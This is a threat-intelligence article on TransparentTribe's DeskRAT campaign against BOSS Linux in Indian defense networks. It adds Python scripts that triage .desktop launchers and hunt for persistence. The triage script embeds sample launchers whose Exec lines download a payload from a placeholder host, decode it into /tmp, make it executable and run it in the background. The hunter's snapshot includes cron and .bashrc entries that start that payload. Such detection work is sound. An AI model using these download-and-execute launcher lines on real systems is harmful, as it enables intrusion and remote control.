The Pakistan-linked threat group TransparentTribe has been running a phishing campaign since June 2025 that deploys DeskRAT, a Golang-based remote access trojan, on Linux systems in Indian defense networks. The attacks target BOSS Linux with malicious ZIP archives disguised as official documents. Cybersecurity firms CYFIRMA and Sekoia.io have analyzed the operation and note that its timing tracks regional unrest.
The campaign, attributed to TransparentTribe (also known as APT36 or Operation C-Major), began in June 2025 and was uncovered by CYFIRMA in July 2025. The group, active since at least 2013 and assessed to operate from Pakistan, conducts cyber espionage in support of Pakistani strategic interests, with India as its primary target.
Phishing emails deliver ZIP archives with names such as 'Cyber-Security-Advisory.zip' or 'MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip'. Inside are weaponized .desktop files tailored for BOSS Linux, India's government-endorsed operating system. A .desktop file is a desktop launcher: when the user opens it, the desktop environment runs whatever command its Exec entry names. Here that entry is a Bash one-liner that uses only utilities already present on the system (curl, base64, and eval) to fetch an encoded payload from domains including modgovindia[.]com. The one-liner decodes the payload into the /tmp/ directory, marks it executable, and starts it silently in the background, while opening a decoy PDF such as 'CDS_Directive_Armed_Forces.pdf' in Firefox so the victim sees the document they expected.
Earlier iterations fetched the payload from Google Drive links; recent attacks have moved to dedicated staging servers for better stealth. Inside the .desktop file, the commands are buried among lines of commented-out PNG data to frustrate casual inspection. The chain is not flawless: some variants decode with xxd, which is not installed by default on BOSS Linux, so execution can fail on exactly the systems being targeted.
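As an added example (not code from CYFIRMA, Sekoia.io, or the campaign), the following Python script triages .desktop launchers for the behaviours described above: a shell wrapper that downloads and base64-decodes a payload into /tmp, marks it executable, backgrounds it and opens a decoy PDF; a Name that claims to be a document while Type=Application; and commented-out binary blobs padding the file. It also decodes any inline `echo <base64> | base64 -d` stage before matching, so indicators hidden one layer down are still seen. The three sample launchers, the staging.example.invalid domain and the /tmp/.x path are constructed for the demonstration and are not indicators from the campaign.

```python
"""Triage Linux .desktop launchers for the lure behaviours described in the article."""
import base64
import binascii
import re

# Constructed samples, not files from the campaign. Domain and paths are placeholders.
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=CDS_Directive_Armed_Forces.pdf
Terminal=false
Icon=application-pdf
Exec=bash -c "curl -s https://staging.example.invalid/p | base64 -d > /tmp/.x; chmod +x /tmp/.x; nohup /tmp/.x >/dev/null 2>&1 & firefox /tmp/decoy.pdf"
# iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwACAAEAAAAA
# hwGA60e6kgAAAABJRU5ErkJggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"""

# Variant that hides the whole stage behind eval of an inline base64 string;
# the inner command is encoded in code so the sample stays self-consistent.
_INNER = ("curl -s https://staging.example.invalid/p | base64 -d > /tmp/.x; "
          "chmod +x /tmp/.x; nohup /tmp/.x >/dev/null 2>&1 &")
LAYERED_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=MoM_Defence_Sectors.pdf\nTerminal=false\n"
    'Exec=sh -c "eval \\"$(echo %s | base64 -d)\\""\n'
    % base64.b64encode(_INNER.encode()).decode()
)

BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Terminal=false
"""

DESKTOP_KEY = re.compile(r"^([A-Za-z0-9-]+)(?:\[[^\]]*\])?=(.*)$")
BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")
DOC_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$", re.I)
INLINE_B64 = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")

# One regex per behaviour of the described one-liner, matched against the Exec command.
EXEC_INDICATORS = {
    "shell_wrapper": r"\b(?:ba)?sh\s+-c\b",
    "downloader": r"\b(?:curl|wget)\b",
    "decoder": r"\bbase64\s+(?:-d|--decode)\b|\bxxd\s+-r\b",
    "eval": r"\beval\b",
    "tmp_path": r"(?:>|\s)/(?:tmp|dev/shm)/\S+",
    "chmod_exec": r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b",
    "background": r"\bnohup\b|\s&(?:\s|$)",
    "decoy_viewer": r"\b(?:firefox|xdg-open|evince)\b[^;&|]*\.pdf\b",
}


def parse_desktop(text):
    """Return ({key: value}, [comment lines]); the first occurrence of a key wins."""
    keys, comments = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        if line.startswith("#"):
            comments.append(line)
            continue
        m = DESKTOP_KEY.match(line)
        if m and m.group(1) not in keys:
            keys[m.group(1)] = m.group(2)
    return keys, comments


def expand_inline_base64(cmd):
    """Append the plaintext of every `echo <b64> | base64 -d` stage found in cmd."""
    stages = []
    for blob in INLINE_B64.findall(cmd):
        try:
            stages.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return cmd + "".join("\n" + s for s in stages), len(stages)


def triage_desktop(text):
    keys, comments = parse_desktop(text)
    exec_cmd = keys.get("Exec", "")
    scan_text, decoded_stages = expand_inline_base64(exec_cmd)
    hits = [name for name, pat in EXEC_INDICATORS.items() if re.search(pat, scan_text)]
    if decoded_stages:
        hits.append("inline_base64_stage")
    name = keys.get("Name", "")
    if DOC_EXT.search(name) and keys.get("Type", "").lower() == "application":
        hits.append("document_masquerade")   # claims to be a document but runs a program
    if sum(1 for c in comments if BLOB.search(c)) >= 2:
        hits.append("comment_blob")          # commented-out binary/base64 padding
    return {"name": name, "exec": exec_cmd, "indicators": hits,
            "verdict": "suspicious" if len(hits) >= 3 else "benign"}


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_DESKTOP), ("layered", LAYERED_DESKTOP),
                          ("benign", BENIGN_DESKTOP)):
        print(label, triage_desktop(sample)["verdict"], triage_desktop(sample)["indicators"])
```

The threshold of three indicators is a starting point for a mail-gateway or endpoint check, not a tuned rule: a legitimate launcher that runs `sh -c` with a `&` will score two, and a ZIP containing any Type=Application launcher whose Name ends in .pdf deserves a look regardless of score.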
The final payload is DeskRAT, a modular Golang remote access trojan whose descriptive function names suggest the code was written with large language model assistance. The analyzed sample (MD5: 3563518ef8389c7c7ac2a80984a2c4cd) also contains evasion routines that are never called. DeskRAT persists through systemd services, crontab entries, autostart files, and bash scripts. It talks to its C2 servers, including seeconnectionalive[.]website and newforsomething[.]rest, over plain, unencrypted WebSocket (ws://) on port 8080, opening with a JSON message that carries fake, hardcoded metadata such as a Microsoft Office version string.
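To hunt for the persistence just described, here is an added Python example (not part of the CYFIRMA or Sekoia.io analysis) that walks a snapshot of a host's configuration and flags systemd ExecStart lines, crontab entries, autostart Exec lines and shell startup files that launch a binary from a world-writable temp directory or a hidden directory under a home directory, which is where a one-liner like the one above drops its payload. Reading "bash scripts" as hooks placed in shell rc files is an assumption, as is the snapshot itself, which is constructed inline as a dict of path to contents rather than read from disk.

```python
"""Hunt a Linux configuration snapshot for the four persistence mechanisms named above."""
import re

# Launch targets worth a second look: world-writable temp dirs and hidden dirs under a
# home directory. The lookbehind keeps /usr/tmp/ or ./tmp/ from matching.
SUSPICIOUS_PATH = re.compile(
    r"(?<![\w./-])(?:/tmp|/var/tmp|/dev/shm)/\S+"
    r"|(?<![\w./-])(?:/home/[^/\s]+|/root|~)/\.[^/\s]+/\S+"
)

# Constructed snapshot (assumption): a real hunt would read these paths from the host
# and add `crontab -l` output for every user. /tmp/.x and .sysupd are placeholders.
SNAPSHOT = {
    "/etc/systemd/system/ssh.service":
        "[Service]\nExecStart=/usr/sbin/sshd -D\nRestart=on-failure\n",
    "/home/analyst/.config/systemd/user/sysupd.service":
        "[Unit]\nDescription=System update helper\n[Service]\n"
        "ExecStart=/home/analyst/.config/.sysupd/upd\nRestart=always\n"
        "[Install]\nWantedBy=default.target\n",
    "/var/spool/cron/crontabs/analyst":
        "# m h dom mon dow command\n0 3 * * * /usr/bin/backup.sh\n"
        "@reboot /tmp/.x >/dev/null 2>&1\n",
    "/home/analyst/.config/autostart/nm-applet.desktop":
        "[Desktop Entry]\nType=Application\nExec=nm-applet\n",
    "/home/analyst/.config/autostart/update.desktop":
        "[Desktop Entry]\nType=Application\nName=Update\nExec=/tmp/.x\n",
    "/home/analyst/.bashrc":
        "alias ll='ls -l'\nnohup /tmp/.x >/dev/null 2>&1 &\n",
}


def classify(path, line):
    """Map a file path plus one of its lines to a persistence mechanism, or None."""
    if path.endswith(".service") and line.startswith("ExecStart="):
        return "systemd"
    if "/cron" in path:
        return "cron"
    if "/autostart/" in path and line.startswith("Exec="):
        return "autostart"
    if re.search(r"/\.(?:bashrc|bash_profile|profile|zshrc)$", path):
        return "shell_rc"
    return None


def hunt_persistence(snapshot):
    """Return one finding per line that hooks a suspicious path into a persistence mechanism."""
    findings = []
    for path, content in snapshot.items():
        for raw in content.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            mechanism = classify(path, line)
            if mechanism and SUSPICIOUS_PATH.search(line):
                findings.append({"mechanism": mechanism, "file": path, "line": line})
    return findings


def mechanisms_seen(findings):
    return sorted({f["mechanism"] for f in findings})


if __name__ == "__main__":
    for f in hunt_persistence(SNAPSHOT):
        print(f"[{f['mechanism']}] {f['file']}: {f['line']}")
```

Every finding needs review rather than automatic action: developer tooling in ~/.local or a build system staging binaries in /tmp will match the same pattern. The point is that a payload started by the one-liner has to be re-launched from somewhere after a reboot, and these four locations are where that hook lands.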
Operators control infected hosts from a web-based dashboard that provides file browsing, data exfiltration, remote command execution, and upload of additional payloads. The lures coincide with unrest tied to the geopolitically sensitive Ladakh region, which borders both Pakistan and China: protests in Ladakh in September 2025 and marches in New Delhi in August 2025.
Analysts read TransparentTribe's move to Linux targets as a step up in sophistication and urge Indian defense networks to tighten email filtering, harden systems, and monitor for the persistence and network behaviours noted above.